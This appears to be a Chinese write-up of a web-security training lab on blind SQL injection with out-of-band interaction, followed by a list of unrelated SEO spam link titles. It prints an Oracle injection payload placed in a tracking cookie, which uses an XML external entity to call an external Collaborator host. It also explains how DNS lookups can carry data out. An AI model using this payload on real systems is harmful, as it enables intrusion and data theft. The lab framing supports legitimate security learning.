当前位置: 首页 > wzjs >正文

门户网站开发报价免费seo搜索优化

门户网站开发报价,免费seo搜索优化,长沙做信息seo网站,投资管理公司注册文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 带外交互的 SQL 盲注 简介: 本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。 SQL查询是异步执…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外交互的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

要解决这个实验,利用SQL注入漏洞导致DNS查找Burp Collaborator。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示:

你可以在我们的SQL注入备忘单上找到一些有用的有效载荷。

进入实验室

仍然是一个商店页面

构造 payload

在本关主要目的是体验 OOB(DNS 带外),DNS 外带的核心是让盲注变为显错注入,在无法利用漏洞获得回显的情况下,目标可以发起请求,这个时候就可以通关 DNS 请求把想获得的数据外带出来

依旧是使用 burp 进行抓包注入

利用 union 联合查询结合 xml 外部实体攻击(XXE)来构造 payload

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://1prcgeu2pgeoycglrzqok5dsxj3ar2fr.oastify.com/"> %remote;]>'),'/l') FROM dual--

extractvalue()函数是 Oracle 数据库的 XML 函数,用于从 XML 片段中提取值

xmltype()构造是将字符串转换为 Oracle 的 XMLtype 对象,强制解析 XML 内容

打开 burp 中的 Collaborator,复制链接

将 payload 粘贴在 cookie 后面,并进行 url 编码

返回 Collaborator 模块,点击 Poll now,可以看到返回四个域名,以及对应的源 ip 地址

返回商店页面,可以看到通关提示

http://www.dtcms.com/wzjs/316044.html

相关文章:

  • 深圳网站推广优化市场营销网站
  • 国内成熟的crm系统长春做网站公司长春seo公司
  • 网站商城定制网站建设快速排序优化
  • 新建网站外链怎么做手机seo排名
  • 如何对网站的图片做cdnseo推广技巧
  • iis不能新建网站有没有好用的网站推荐
  • wordpress app发表长沙优化科技有限公司
  • wordpress 多用户样式seo分析是什么意思
  • 图片在线制作二维码sem优化公司
  • 做网站费用记入什么会计科目广州市疫情最新
  • 前端培训班深圳百度搜索排名优化
  • 网页设计版权怎么写知乎关键词排名优化工具
  • 武汉网站建设设计哪家好购物网站页面设计
  • 网站专项审批查询沈阳网站优化
  • 网站模板是什么意思百度关键词排名十大排名
  • 网站建站建设工作总结百搜科技
  • 怎么在av网站做引流歌尔股份砍单
  • 宜兴建设局质监网站培训班招生方案
  • 做期货看啥子网站网页模板代码
  • 福建凭祥建设工程有限公司网站黄冈网站推广优化找哪家
  • 三门峡网站建设费用seo视频教程百度网盘
  • 移动互联网开发软件设计优化公司网站
  • 小型网站开发时间周期搜索引擎优化网站
  • html特效网站网站关键词优化排名外包
  • 人才网站建设cms精准引流获客软件
  • 58南浔做网站深圳优化服务
  • 做网站主页效果图北京seo相关
  • 南京网站建设润洽完整的网页设计代码
  • 樟木头镇网站仿做备案域名购买
  • 网站管理人员队伍建设有待加强沈阳seo按天计费